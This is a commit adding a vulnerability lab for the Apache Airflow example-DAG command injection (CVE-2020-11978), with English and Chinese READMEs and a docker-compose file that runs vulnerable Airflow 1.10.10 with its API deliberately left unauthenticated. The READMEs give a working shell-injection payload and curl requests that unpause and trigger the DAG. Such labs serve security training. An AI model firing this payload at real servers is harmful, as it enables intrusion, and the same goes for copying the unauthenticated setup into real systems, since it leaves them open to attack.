first commit

BIN  airflow/CVE-2020-11978/1.png  (new binary file, 118 KiB, not shown)
BIN  airflow/CVE-2020-11978/2.png  (new binary file, 18 KiB, not shown)
BIN  airflow/CVE-2020-11978/3.png  (new binary file, 16 KiB, not shown)
BIN  airflow/CVE-2020-11978/4.png  (new binary file, 11 KiB, not shown)

airflow/CVE-2020-11978/README.md  (new file, 46 lines)
@@ -0,0 +1,46 @@

# Apache Airflow Command Injection in Example DAG (CVE-2020-11978)

[中文版本(Chinese version)](README.zh-cn.md)

Apache Airflow is an open-source, distributed task scheduling framework. In version 1.10.10 and earlier, the example DAG `example_trigger_target_dag` contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary commands in the worker process.
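
The flaw comes from the example DAG substituting the user-supplied `message` value from the Configuration JSON directly into a `BashOperator` command template along the lines of `echo "Here is the message: '<message>'"`. As an illustrative sketch (not the exact DAG source, which may differ slightly between versions), the payload used later in this README turns the rendered command into:

```bash
# What the worker shell effectively runs after template substitution (illustrative):
# the payload closes the quotes, injects its own command, then comments out the rest.
echo "Here is the message: ''";touch /tmp/airflow_dag_success;#'"
```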

Since many components need to be started, the environment may be slow to come up. Please allocate more than 2GB of memory to the virtual machine running it.

References:

- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/pberba/CVE-2020-11978>

## Vulnerability Environment

Execute the following commands to start Airflow 1.10.10:

```bash
# Initialize the database
docker compose run airflow-init

# Start the services
docker compose up -d
```
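
After the containers are up, you can optionally confirm that the webserver is ready before moving on. A minimal check that reuses the `/health` endpoint already queried by the compose file's own healthcheck (replace `your-ip` with the target address):

```bash
# Should return a small JSON document describing webserver/scheduler health
curl -s http://your-ip:8080/health
```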

## Exploit

Visit `http://your-ip:8080` to open the Airflow web UI, then switch the `example_trigger_target_dag` DAG from "Off" to "On":

![](1.png)
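
If you prefer not to click through the UI, this step can also be performed against Airflow 1.10's experimental REST API, which is reachable without authentication here because the compose file sets `AIRFLOW__API__AUTH_BACKEND` to `airflow.api.auth.backend.default`. A sketch (verify the route against your Airflow version):

```bash
# Unpause (enable) the vulnerable example DAG via the experimental API
curl -s "http://your-ip:8080/api/experimental/dags/example_trigger_target_dag/paused/false"
```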

Click the "Trigger" button on the right of that DAG, fill in the Configuration JSON with the crafted payload `{"message":"'\";touch /tmp/airflow_dag_success;#"}`, and trigger the run:

![](2.png)
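
The DAG run itself can likewise be created through the experimental API instead of the web form; the `conf` field carries the same JSON as the Configuration JSON box above. A sketch under that assumption (the escaping just reproduces the payload string inside shell and JSON quoting):

```bash
# Trigger example_trigger_target_dag with the injected "message" value
curl -s -X POST "http://your-ip:8080/api/experimental/dags/example_trigger_target_dag/dag_runs" \
  -H "Content-Type: application/json" \
  -d "{\"conf\": {\"message\": \"'\\\";touch /tmp/airflow_dag_success;#\"}}"
```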

Wait a few seconds and the DAG run will finish with a "success" state:

![](3.png)

Go into the CeleryWorker container to check the result; `touch /tmp/airflow_dag_success` has been executed successfully:

```bash
docker compose exec airflow-worker ls -l /tmp
```

![](4.png)

airflow/CVE-2020-11978/README.zh-cn.md  (new file, 46 lines)
@@ -0,0 +1,46 @@

# Apache Airflow Command Injection in an Example DAG (CVE-2020-11978)

Apache Airflow is an open-source, distributed task scheduling framework. In version 1.10.10 and earlier, its example DAG `example_trigger_target_dag` contains a command injection vulnerability through which an unauthorized visitor can execute arbitrary commands on the worker.

Since many components have to be started, the environment can be slow to come up; running it may require more than 2GB of memory.

References:

- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/pberba/CVE-2020-11978>

## Vulnerability Environment

Execute the following commands in order to start Airflow 1.10.10:

```bash
# Initialize the database
docker compose run airflow-init

# Start the services
docker compose up -d
```
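
Because every service in this compose file defines a healthcheck, you can wait for them all to report healthy before continuing. A minimal check using standard Docker Compose commands (nothing here is specific to Vulhub):

```bash
# All containers should eventually show a "healthy" status
docker compose ps

# If a service stays unhealthy, inspect its logs, e.g. the webserver
docker compose logs --tail=50 airflow-webserver
```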

## Exploitation

Visit `http://your-ip:8080` to open the Airflow web UI and switch `example_trigger_target_dag` from Off to On:

![](1.png)

Then click the trigger button, enter `{"message":"'\";touch /tmp/airflow_dag_success;#"}` in the Configuration JSON box, and click `Trigger` to run the DAG:

![](2.png)

After a few seconds you can see that the run succeeded:

![](3.png)

Check inside the CeleryWorker container:

```bash
docker compose exec airflow-worker ls -l /tmp
```

You can see that `touch /tmp/airflow_dag_success` was executed successfully:

![](4.png)

airflow/CVE-2020-11978/docker-compose.yml  (new file, 90 lines)
@@ -0,0 +1,90 @@

version: '3'
x-airflow-common:
  &airflow-common
  image: vulhub/airflow:1.10.10
  environment:
    &airflow-common-env
    AIRFLOW__CORE__EXECUTOR: CeleryExecutor
    AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
    AIRFLOW__CORE__FERNET_KEY: ''
    AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
    AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
    #AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
    AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default'
  user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
  depends_on:
    redis:
      condition: service_healthy
    postgres:
      condition: service_healthy

services:
  postgres:
    image: postgres:13-alpine
    environment:
      POSTGRES_USER: airflow
      POSTGRES_PASSWORD: airflow
      POSTGRES_DB: airflow
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "airflow"]
      interval: 5s
      retries: 5

  redis:
    image: redis:5-alpine
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 5s
      timeout: 30s
      retries: 50

  airflow-webserver:
    <<: *airflow-common
    command: webserver
    ports:
      - 8080:8080
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-scheduler:
    <<: *airflow-common
    command: scheduler
    healthcheck:
      test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-worker:
    <<: *airflow-common
    command: worker
    healthcheck:
      test:
        - "CMD-SHELL"
        - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-init:
    <<: *airflow-common
    command: initdb
    environment:
      <<: *airflow-common-env
      _AIRFLOW_DB_UPGRADE: 'true'

  flower:
    <<: *airflow-common
    command: flower
    ports:
      - 5555:5555
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
      interval: 10s
      timeout: 10s
      retries: 5